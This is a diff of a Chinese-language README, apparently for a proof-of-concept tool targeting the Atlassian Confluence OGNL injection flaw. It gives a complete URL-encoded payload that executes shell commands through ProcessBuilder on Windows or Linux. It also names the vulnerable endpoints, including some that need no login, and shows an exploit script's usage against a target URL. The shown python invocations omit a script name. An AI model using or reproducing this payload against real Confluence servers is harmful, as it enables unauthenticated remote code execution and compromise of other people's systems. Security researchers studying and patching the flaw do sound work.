| skipped 2 lines |
3 | 3 | | |
4 | 4 | | Atlassian Confluence 是企业广泛使用的维基系统,其部分版本中存在OGNL 表达式注入漏洞。攻击者可以通过漏洞,不需要任何用户的情况下在目标Confluence 中执行任意代码。 |
5 | 5 | | |
6 | | - | 安装过程: |
7 | | - | |
8 | | - | ![image](https://user-images.githubusercontent.com/91398948/138819468-67da589d-d6f4-43d6-93ef-64d9bb017b7e.png) |
9 | | - | |
10 | | - | 数据库的账号密码postgres |
11 | | - | |
12 | | - | ![image](https://user-images.githubusercontent.com/91398948/138819578-3b9866ce-c0d8-4b4b-9a0b-239e4a29189c.png) |
13 | | - | |
14 | | - | 设置邮箱账号密码 |
15 | | - | |
16 | | - | ![image](https://user-images.githubusercontent.com/91398948/138819813-4f0abac1-fcfd-477c-8957-3ce8fead1276.png) |
17 | | - | |
18 | | - | ![image](https://user-images.githubusercontent.com/91398948/138819969-60410cd6-bb09-4542-a49e-dd09fffac997.png) |
19 | | - | |
20 | | - | 执行任意命令 |
| 6 | + | queryString参数执行任意命令 |
| 7 | + | ------ |
21 | 8 | | ``` |
22 | 9 | | queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027 |
23 | 10 | | ``` |
24 | 11 | | /pages/createpage.action |
25 | 12 | | 这个接口需要一个可以创建页面的用户权限: |
26 | 13 | | |
27 | | - | <code> |
28 | | - | http://your-ip:8090/pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027 |
29 | | - | </code> |
| 14 | + | /pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027 |
30 | 15 | | |
31 | 16 | | ![image](https://user-images.githubusercontent.com/91398948/138823352-08ff1fc2-adea-4e64-bdfa-df5cde0ca3de.png) |
32 | 17 | | |
| skipped 4 lines |
37 | 22 | | ![image](https://user-images.githubusercontent.com/91398948/138823589-ef4bcae0-61ca-4825-9c9b-79db3063044e.png) |
38 | 23 | | |
39 | 24 | | /pages/createpage-entervariables.action |
40 | | - | 这个路径无需用户登录: |
41 | 25 | | |
42 | | - | ![image](https://user-images.githubusercontent.com/91398948/138824141-1d199514-2c60-4b67-aea1-c176c486dd6c.png) |
| 26 | + | /pages/doenterpagevariables.action |
| 27 | + | |
| 28 | + | 不需要登录,用POST请求 |
| 29 | + | |
| 30 | + | ![image](https://user-images.githubusercontent.com/91398948/138827501-97703a55-43b3-49b5-b5b8-fd2c8233144a.png) |
| 31 | + | |
| 32 | + | 脚本测试: |
| 33 | + | ------ |
| 34 | + | 命令: |
| 35 | + | <code> |
| 36 | + | python3 -r test.txt |
| 37 | + | </code> |
43 | 38 | | |
44 | | - | /pages/doenterpagevariables.action |
45 | | - | 这个也不需要登录(页面模板向导) |
| 39 | + | 脚本利用: |
| 40 | + | ------ |
| 41 | + | 命令: |
| 42 | + | <code> |
| 43 | + | python3 -u http://example.com |
| 44 | + | </code> |
| 45 | + | |
| 46 | + | |
46 | 47 | | |
47 | | - | ![image](https://user-images.githubusercontent.com/91398948/138824310-4d31837d-c269-42f9-a954-3179bd75b120.png) |
48 | 48 | | |
49 | 49 | | 参考: |
50 | 50 | | |
| skipped 8 lines |